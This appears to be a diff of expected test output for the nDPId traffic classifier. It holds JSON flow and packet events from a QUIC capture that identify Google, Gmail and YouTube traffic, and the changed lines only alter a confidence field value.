02261{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431155536876,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1431155536876,"pkt":"eJKcD6iOZHACjT05CABFAAVi+w8AADYRFcbYOtRlwKgBbQG74ekFTrySAAED7yXOnwe7pFDDfekcKJR3Jy2sqO+OrEMBkrmlA5460PLSsQWLxQP3oiY5d8U9vyThqGCVEM5n\/b30dAd2DjWMikTcCyMma2f07JhYHF3MMGVgNWOe6MGYINMPJ609w8TfRzFDXO2Hv3Rd+Io3\/xrzZn4oPs6zhHI1yq2C3Bu04kRZDHQePoRj30\/8HvjxNKB4JiKyE+zKdMREBQ3JOi\/Z6sOIMbX9akogkYpnl7ng6wuSDWdU0O6S17QqQ\/PZNbWcKj10ybS4iwVQA0f8amB7S9uZIaouXNiBUNnVoBkvwUNJHLfYTkO7Lcrh9\/y6VuU0sUqC5BwPmW+2ikCeMngUD1xHT1Lx5xcuKKpYgNXg5fiz8miFT9HCjdjO6B4AMX2tdmMxafKWE\/OE83wkxbiDjermaqDLFN43iZrsa77dngVKSa0JOoliFCpsBQc+8MPNJciywBt2F7RgKowH2h+9Qk9ORQtDAbuXMpSiJJWSUWGURbG9ZouMcFzy3aCPhH9WEaiDxSqv5bG1C+4++Ap3JmLZGydHT1SxVwfUUCxHryOH1SJLcVb8wYjogx1ZyV2hUKKGb\/LTkrzKQgQmaow0b30+zmXo8EqAqNi+pbkwMCjRuhbpSGWkDycL5nwxuP9Ml3fkw+Nua2MwUp0EfcBQbRU9wNgqxQ9uJseySfgLNd277XFk6kBsEbZHLkwoqVC16i6UXqO9Bq9Qa6OSE4HmTd0ZK\/TJwTkvyZH7HArDOO\/IcXlmUhCYygfBL2Q5ZpNExxrN9hs9fyUTlDAy\/fKVbi1DmTvb8UQ08IKIHR88Yq94i78i11E4Ck+d\/mt1HMNvsgPj2pD+djmLPe2eSTH37Jk2vmFRiqCOpbpsl49D\/VP3D6Iqy69k4ASDn2RRISJtJTG3B4eSG0UcIyl51iCsWhHCXqo+IYYFVP5DZZddk8U1w9uBnJXeOg1TXZTOMI0ol6bS146IgKA69vbLEVfalKBSuGdHvDKyOMSnLak5kQ2gF6fQS9y3naenu5fopH54EXjO3jjfmTVJmGvZC\/P1NiZtWEgaqDhB2DugL5t17Tc3VwmJfqg+3eAVYWabEKtkMdIl3iArLACUUBNCZz1HkomKYV+WYy79+d13Y8v1fzFaFyLLqqM4eyurBPDRG\/+y1oiSpL+pmxwnbgxI3utzVErOYH+5lhn82g\/+Ii+SkdpS0RH4VCbqV\/v0Y4Y5Od4xYJhouL7GcBe5gBVDLL2wvDGN\/2TxDwPjLE+A3+O2Fa4G5F\/+gjnrsB0wdiL\/ilvOHsRXVpnfbw+QbFdGjFQzBh00mHjlv+hyldAVX6DRrmAyZqfHl4R8DYS3AwjxssPWDwDtSUMlQQpikBERZ9MMlFb4xTKRR\/wBi8a8Irtzx\/kIza\/1v2NJPtS13JBH+AEVAHqIKkeVWhalz8eieG0tc75G2spbagtiyakNL\/rq+i0PePLukIW0MDDsvi7O7dn\/0fwGspoErTl6j3PKwj7+sTyyEqAVRQx1M7OB+kmMDRumZ6Ct9DotkVa72qOqLha
\/8xxMPobKOFlHa3535yRdBIpdRmga9bEYopLGGzkYHAzAiGpiXAo7oYF9gbpS7a5ciOCtFbOspMqjc6us7YE1Fk9eZR8mOK3nE7WlV4miQCj5Ye\/jSzjCwJgC1JXYSzigmV7HoFUEa9032KRB3TfddhJ9qY+MTGbbTrJ2h+zE2tLE+GlMJ43i68EjkXl4FQgRWpuP1j6L9IzE9WrKG1pRl60aGD77YrqqhZeBKTB3VaLzjU5uW3RnvxwpEMU20qKXXlS1"} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","packets-captured":414,"packets-processed":413,"total-skipped-flows":0,"total-l4-payload-len":237528,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1461850699450} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1461850699450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1461850699450,"pkt":"OGO7P47K7LHXhMJyCABFAAViImxAAEAR\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\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 
+00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1461850699600,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1461850699600,"pkt":"OGO7P47K7LHXhMJyCABFAAViIotAAEAR\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\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1461850699901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1461850699901,"pkt":"OGO7P47K7LHXhMJyCABFAAViIsFAAEAR\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\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":413,"flow_first_seen":1431155536815,"flow_last_seen":1431155574747,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":237528,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":1461850703450,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":413,"flow_first_seen":1431155536815,"flow_last_seen":1431155574747,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":237528,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":1461850703450,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"}} 
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","packets-captured":420,"packets-processed":419,"total-skipped-flows":0,"total-l4-payload-len":244348,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1463060980301} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1463060980301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980301,"pkt":"8IQvSpdgeJKcD6iOCABFAAViG\/5AAEARmp7AqAFprNkQBLJlAbsFTr+DDUPl1BjSnP0KUTAyNQFyZIfG66V5bj99kfIBoAEABENITE8XAAAAUEFEAIgBAABTTkkAlgEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3Lmdvb2dsZS5jb21PyGNIiSYlWYMNKJNAlwv39ix54lRFVA6paRsUl4FQy0hWHom6FQQ9JcZPH9joUxX+SDLF1j\/DSdX0UTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn06ylDo5Ug9+nOea5qJJts1jMXRdJCxw2QvK85nmQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQarjm3cTKFpJVCrT7eADgKAAAAAFg1MDkAABAAHgAAAMpYWB84oseWX+q27ipmj\/RQLfsZQqQtGKexDF79uuJfAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5Cprnnr7MUAAJJnZtEbkxP245vVr56GfjMCMAwif3n\/lWOThmdSnoedzP2jx+7ZPMWRBUv\/hZavd3FPUhQwHHwpvJJDzRcoSGYXtOQyhcYCVpGlxHD65Db8HFfgEKEx\/YlE\/aFaPqB1XqWWzf4zDCgIc\/Djzy4R\/py4JVjfq9V0ooIkHbH+8mAcpgdNt3gj0SeICAOM6wnOXFVXQaU2KKd\/llBTkdtTIS8p4UckAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980313,"flow_last_seen":1463060980313,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463060980313,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1463060980313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1463060980313,"pkt":"8IQvSpdgeJKcD6iOCABFAACUtgVAAEARBWbAqAFprNkQA54NAbsAgHEsDKM2rKXAEd7wIt3qCq5m3TavpAsTDbAsFGxmQjrMNGgPLp5\/67eBvHP3BJ3FiMAS4anKHt6qD2LZa9lkPD+xi9VHkCY0QuwL2qSbKNzU+YmHNEsRyVDptUSV5HeCE\/peVLnXWfr\/zBYlTVvhdUjE1rsevsCPj6RN"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1463060980336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980336,"pkt":"8IQvSpdgeJKcD6iOCABFAAVieqhAAEARTajAqAFp2DrS7oaGAbsFThSMDaSWOQdzcSypUTAyNQHV5wqJLuvacsEa2ggBoAEABENITE8XAAAAUEFEAFEBAABTTkkAYAEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS13d3cueW91dHViZS5jb205fPBATCqFxnBl7Xv68Z9fD9Nmah0fi4FMd4fkZ11E\/CzEloDogZdL\/nncpFiRZ2yDvER3hyJLRuKPu2yNKulWJLAj1kd1TL1O1ht+4DYSFzHaxW1I0SXh61LEyPn0ZJNHzIO4+v+uSwxJi411oZGLUTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn0IqnIQgaTDzQq3tVtNNLVAtwTevP964BOlEvwfGQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjSzHyexPo2T9WCZD4U6m8alAAAAAFg1MDkAABAAHgAAAGluEpDbken\/KU7Y\/ELsDAQ\/jJay9FDlf0UZ5YuPrPZyAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrcNABADyUl7\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"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463060980349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980349,"pkt":"8IQvSpdgeJKcD6iOCABFAAViOWpAAEARi2bAqAFp2DrWbr09AbsFTixPDZgh\/ntZ+3x4UTAyNQEexu19QA91RUfxOasBoAEABENITE8XAAAAUEFEAD0BAABTTkkASAEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0taS55dGltZy5jb20wbVd\/xJG3uBvID0WAK+ohpx7cyOJ2dtebsPJwjywjfFuGDbC64HOW7daWVAssjrQthDJVGy+I6s+aKoR7mAYJDhdEEUKOBhWT8KdUZ+QsCFwZeIYkra13fPULR+kjxZwRpLY7sCam2MMIw19PW15Bf2xgAD\/plCBqG73f91yMrvU7pcyTjshGUTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn0h3jC79n8KmTTqLGBqN
DsO\/+yFOWZXiuGsfLkAWQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjS7Vl7XCOzOLURPKzlhG40eAAAAAFg1MDkAABAAHgAAAFNDC7W8XmRlWw2IWugDdRStg\/GKmfFye59SXxQJoGstAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrbhIBAFhkMdLsvVn8dBclelTniFgmv7sivZhjmekneMr+6hkdFDGQb\/mkcgr5pmlxB2Adl4UO+Q5ZRPsivx7E2pdvMReaoISz1dlKFlGYuAatdBRMcJaEN+iNYNqPa0KmC4oIMq310RgCpJw2LDB3pVyVeASJBnCusnfTUVrGDsYCI0tVvwmaJscLHqtT1URTpBOCGDqnTS9VwZ\/TQa7YakZ29aLWPRkUAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 
